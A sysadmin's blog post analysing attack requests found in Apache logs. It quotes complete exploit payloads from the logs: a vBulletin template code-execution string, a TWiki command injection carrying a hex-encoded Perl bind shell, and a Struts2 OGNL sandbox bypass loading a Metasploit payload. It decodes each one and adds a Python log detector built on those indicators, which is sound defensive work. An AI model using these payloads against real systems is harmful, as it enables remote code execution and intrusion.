Curious scans

Lately we have been getting some rather curious scans. On top of the usual hundreds of automated scans... every day we get more crap.


The curious thing this time is that, instead of going after one of the virtual hosts, they were hitting the machine's physical IP, which answers with a static page saying there is nothing to see here.

They started with things like these:

86.13.253.152 - - [19/Nov/2013:15:51:55 +0100] "GET /phpBB2/viewtopic.php?topic=9 HTTP/1.1" 404 481 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
86.13.253.152 - - [19/Nov/2013:15:51:55 +0100] "GET /phpBB2/viewtopic.php?topic=8 HTTP/1.1" 404 481 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
86.13.253.152 - - [19/Nov/2013:15:51:55 +0100] "GET /phpBB2/viewtopic.php?topic=7 HTTP/1.1" 404 481 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
86.13.253.152 - - [19/Nov/2013:15:51:54 +0100] "GET /phpBB2/viewtopic.php?topic=6 HTTP/1.1" 404 481 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

(attacker's IP left in on purpose...)

Then it started trying things like this:

86.13.253.152 - - [19/Nov/2013:15:51:13 +0100] "GET /forum/misc.php?do=page&template=%7b%24%7bpassthru%28chr%28101%29.chr%2899%29.chr%28104%29.chr%28111%29.chr%2832%29.chr%28101%29.chr%2868%29.chr%2872%29.chr%2874%29.chr%28103%29.chr%2870%29.chr%2869%29.chr%28120%29.chr%28100%29.chr%28118%29.chr%28104%29.chr%2872%29.chr%2871%29.chr%2886%29.chr%2865%29.chr%28109%29.chr%28113%29.chr%2889%29.chr%2870%29.chr%2898%29.chr%2883%29.chr%2866%29.chr%2888%29.chr%2854%29.chr%28114%29.chr%2870%29.chr%2857%29.chr%2880%29.chr%2876%29.chr%2848%29.chr%28110%29.chr%28110%29.chr%2882%29.chr%28117%29.chr%28110%29.chr%28102%29.chr%28109%29.chr%2854%29.chr%28117%29.chr%2880%29.chr%2880%29.chr%2868%29.chr%2882%29.chr%2882%29.chr%28119%29.chr%2855%29.chr%2873%29.chr%28103%29.chr%2865%29.chr%2871%29.chr%28110%29.chr%2848%29.chr%28109%29.chr%2898%29.chr%2866%29.chr%28115%29.chr%2878%29.chr%2855%29.chr%2887%29.chr%2899%29.chr%28105%29.chr%2883%29.chr%2879%29.chr%28120%29.chr%2873%29.chr%2859%29.chr%28112%29.chr%28101%29.chr%28114%29.chr%28108%29.chr%2832%29.chr%2845%29.chr%2877%29.chr%2873%29.chr%2879%29.chr%2832%29.chr%2845%29.chr%28101%29.chr%2832%29.chr%2839%29.chr%2836%29.chr%28112%29.chr%2861%29.chr%28102%29.chr%28111%29.chr%28114%29.chr%28107%29.chr%2840%29

I suppose it was trying to exploit this, or this.

Decoded, the `chr()` chain handed to `passthru()` reads `echo <random marker>;perl -MIO -e '$p=fork(` before the logged line is cut off. The `{${...}}` wrapper is PHP's variable-variable syntax, which gets vBulletin's template code to evaluate the expression, and the Perl one-liner is the start of the same bind shell that appears in full in the TWiki request further down. The marker echoed first is what the tool looks for in the response to confirm that code execution worked.

86.13.253.152 - - [19/Nov/2013:15:50:15 +0100] "GET /twiki/bin/view/Main/WebSearch?search=B8Go3W%27%3b/bin/echo%24%7bIFS%7d-ne%24%7bIFS%7d%27\\x70\\x65\\x72\\x6c\\x20\\x2d\\x4d\\x49\\x4f\\x20\\x2d\\x65\\x20\\x27\\x24\\x70\\x3d\\x66\\x6f\\x72\\x6b\\x28\\x29\\x3b\\x65\\x78\\x69\\x74\\x2c\\x69\\x66\\x24\\x70\\x3b\\x24\\x63\\x3d\\x6e\\x65\\x77\\x20\\x49\\x4f\\x3a\\x3a\\x53\\x6f\\x63\\x6b\\x65\\x74\\x3a\\x3a\\x49\\x4e\\x45\\x54\\x28\\x4c\\x6f\\x63\\x61\\x6c\\x50\\x6f\\x72\\x74\\x2c\\x34\\x37\\x35\\x34\\x2c\\x52\\x65\\x75\\x73\\x65\\x2c\\x31\\x2c\\x4c\\x69\\x73\\x74\\x65\\x6e\\x29\\x2d\\x3e\\x61\\x63\\x63\\x65\\x70\\x74\\x3b\\x24\\x7e\\x2d\\x3e\\x66\\x64\\x6f\\x70\\x65\\x6e\\x28\\x24\\x63\\x2c\\x77\\x29\\x3b\\x53\\x54\\x44\\x49\\x4e\\x2d\\x3e\\x66\\x64\\x6f\\x70\\x65\\x6e\\x28\\x24\\x63\\x2c\\x72\\x29\\x3b\\x73\\x79\\x73\\x74\\x65\\x6d\\x24\\x5f\\x20\\x77\\x68\\x69\\x6c\\x65\\x3c\\x3e\\x27%27%7csh%3b%23%27 HTTP/1.1" 404 490 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

This one is a shell command injection through TWiki's search parameter: the quote closes the original argument, `/bin/echo${IFS}-ne` (with `${IFS}` standing in for spaces, so no literal space is needed in the URL) prints the `\x..` string, and the result is piped into `sh`. The hex decodes to `perl -MIO -e '$p=fork();exit,if$p;$c=new IO::Socket::INET(LocalPort,4754,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);system$_ while<>'`, a forking Perl bind shell listening on TCP port 4754. Had it worked, the next thing in the firewall logs would have been a connection to that port.

It wasn't content with just hammering the poor machine, so it carried on with things like this:

86.13.253.152 - - [19/Nov/2013:16:01:47 +0100] "GET /blank-struts2/login.action?username=(#context[\"xwork.MethodAccessor.denyMethodExecution\"]=+new+java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]=+new+java.lang.Boolean(true),%23q%3d%40java.lang.Class%40forName%28%27ognl.OgnlRuntime%27%29.getDeclaredField%28%27%5fjdkChecked%27%29%2c%23q.setAccessible%28true%29%2c%23q.set%28null%2ctrue%29%2c%23q%3d%40java.lang.Class%40forName%28%27ognl.OgnlRuntime%27%29.getDeclaredField%28%27%5fjdk15%27%29%2c%23q.setAccessible%28true%29%2c%23q.set%28null%2cfalse%29%2c%23cl%3dnew%20java.net.URLClassLoader%28new%20java.net.URL%5b%5d%7bnew%20java.io.File%28%27u2TTmr.jar%27%29.toURI%28%29.toURL%28%29%7d%29%2c%23c%3d%23cl.loadClass%28%27metasploit.Payload%27%29%2c%23c.getMethod%28%27main%27%2cnew%20java.lang.Class%5b%5d%7b%40java.lang.Class%40forName%28%27%5bLjava.lang.String%3b%27%29%7d%29.invoke%28null%2cnew%20java.lang.Object%5b%5d%7bnew%20java.lang.String%5b0%5d%7d%29)('meh')&z[(username)(meh)]=true HTTP/1.1" 404 487 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

Attacking Struts 2 (the Apache framework for Java web applications). The OGNL expression smuggled in through the `username` parameter first switches off the sandbox (`xwork.MethodAccessor.denyMethodExecution` to false, `allowStaticMethodAccess` to true) and flips `OgnlRuntime`'s `_jdkChecked`/`_jdk15` fields through reflection, then builds a `URLClassLoader` over a local file `u2TTmr.jar` and calls `metasploit.Payload.main()`. That class name is Metasploit's Java payload, which tells you which tool built the request even though the jar never landed on this box; the static page answered 404 to all of it, just like everything else.

I suppose it was trying to exploit this.
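The interesting part of each of these requests sits under a layer or two of encoding: URL encoding first, then a PHP `chr()` chain in the misc.php request and `\x..` hex in the TWiki one, and Apache additionally escapes backslashes and quotes when it writes the log. A rule that greps the raw line for `perl` or `IO::Socket` never sees them. The following is an added example, not code from the original post: a small Python detector that parses combined-format access log lines, peels off the URL encoding, Apache's escaping and both obfuscation layers, and tags each request with the indicators it then exposes. The sample lines are constructed for the example, modelled on the requests quoted above with the attacker's address replaced by a documentation IP and the payloads shortened; the indicator names and patterns are my own choices, not a published ruleset.

```python
import re
from urllib.parse import unquote

# Constructed sample lines modelled on the requests quoted in the post:
# attacker address replaced with a documentation IP, payloads shortened,
# one benign request added as a control. Not real traffic.
SAMPLE_LOG = r"""
192.0.2.10 - - [19/Nov/2013:15:51:55 +0100] "GET /phpBB2/viewtopic.php?topic=9 HTTP/1.1" 404 481 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
192.0.2.10 - - [19/Nov/2013:15:51:13 +0100] "GET /forum/misc.php?do=page&template=%7b%24%7bpassthru%28chr%28101%29.chr%2899%29.chr%28104%29.chr%28111%29.chr%2832%29.chr%28112%29.chr%28119%29.chr%28100%29%29%7d%7d HTTP/1.1" 404 481 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
192.0.2.10 - - [19/Nov/2013:15:50:15 +0100] "GET /twiki/bin/view/Main/WebSearch?search=B8Go3W%27%3b/bin/echo%24%7bIFS%7d-ne%24%7bIFS%7d%27\\x70\\x65\\x72\\x6c\\x20\\x2d\\x4d\\x49\\x4f%27%7csh%3b%23%27 HTTP/1.1" 404 490 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
192.0.2.10 - - [19/Nov/2013:16:01:47 +0100] "GET /blank-struts2/login.action?username=(%23_memberAccess[%22allowStaticMethodAccess%22]=true,%23c=%23cl.loadClass(%27metasploit.Payload%27))(%27meh%27) HTTP/1.1" 404 487 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
203.0.113.5 - - [19/Nov/2013:16:02:00 +0100] "GET /index.html HTTP/1.1" 200 1043 "-" "curl/7.29.0"
""".strip().splitlines()

# Apache "combined" format: ip ident user [ts] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# PHP chr(N).chr(N)... chains, as in the misc.php request
CHR_CHAIN_RE = re.compile(r'chr\(\d{1,3}\)(?:\.chr\(\d{1,3}\))*')
# \xNN runs, as in the TWiki request (once Apache's \\ escaping is undone)
HEX_RUN_RE = re.compile(r'(?:\\x[0-9a-fA-F]{2})+')


def decode_chr_chain(match):
    codes = re.findall(r'\d{1,3}', match.group(0))
    return ''.join(chr(int(c)) for c in codes if int(c) < 256)


def decode_hex_run(match):
    return bytes.fromhex(match.group(0).replace('\\x', '')).decode('latin-1')


def normalise(request_path):
    """Peel the encodings off a logged request so the indicators become visible."""
    s = unquote(request_path)            # %7b -> {, %23 -> #, %27 -> ' ...
    s = s.replace('\\\\', '\\')          # Apache writes a backslash as \\
    s = s.replace('\\"', '"')            # ... and a double quote as \"
    s = HEX_RUN_RE.sub(decode_hex_run, s)
    s = CHR_CHAIN_RE.sub(decode_chr_chain, s)
    return s


# Indicator names and patterns are this example's own choices, not a published ruleset.
INDICATORS = {
    'app_probe': re.compile(r'/phpBB2/viewtopic\.php|/misc\.php|/twiki/bin/|\.action(\?|$)'),
    'php_code_exec': re.compile(r'\b(passthru|shell_exec|system|exec|eval)\s*\(', re.I),
    'shell_injection': re.compile(r'/bin/(echo|sh|bash)|\$\{IFS\}|\|\s*sh\b'),
    'ognl_sandbox_bypass': re.compile(r'#_memberAccess|allowStaticMethodAccess|denyMethodExecution'),
    'metasploit_artifact': re.compile(r'metasploit\.Payload|perl\s+-MIO'),
}


def analyse(lines):
    """Return one record per request that carries at least one indicator."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                     # not combined format: skip rather than guess
        decoded = normalise(m['path'])
        tags = sorted(name for name, rx in INDICATORS.items() if rx.search(decoded))
        if tags:
            hits.append({
                'ip': m['ip'], 'ts': m['ts'], 'status': int(m['status']),
                'path': m['path'].split('?', 1)[0], 'decoded': decoded, 'tags': tags,
            })
    return hits


def summarise_by_ip(hits):
    """Collapse hits into per-source counts, which is what you need to decide on a block."""
    by_ip = {}
    for h in hits:
        entry = by_ip.setdefault(h['ip'], {'requests': 0, 'not_found': 0, 'tags': set()})
        entry['requests'] += 1
        entry['not_found'] += int(h['status'] == 404)
        entry['tags'].update(h['tags'])
    return by_ip


if __name__ == '__main__':
    found = analyse(SAMPLE_LOG)
    for h in found:
        print(f"{h['ts']} {h['ip']} {h['path']} -> {', '.join(h['tags'])}")
        print(f"    decoded: {h['decoded'][:110]}")
    for ip, s in summarise_by_ip(found).items():
        print(f"{ip}: {s['requests']} flagged, {s['not_found']} answered 404, tags={sorted(s['tags'])}")
```

Run it against a real access log with `analyse(open('/var/log/apache2/access.log'))` and the per-IP summary is the same picture the OSSEC mails were painting, minus the noise: one source, a burst of 404s against paths this server never had, and payloads that name the tool that built them. Note that `normalise()` does exactly one pass of URL decoding; double-encoded payloads (`%2527`) would need a second pass, which is a deliberate omission here so that the decoded string still matches what Apache saw.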

The thing is, the guy spent a good few hours trying stuff... then got bored and went somewhere else.

The annoying part of all this is that I was busy with other things... and the OSSEC alert emails would not stop landing on my phone. Xd. A pity I did not have more time. I need to set up a honeypot...

Glastopf was recommended to me. Any other recommendations?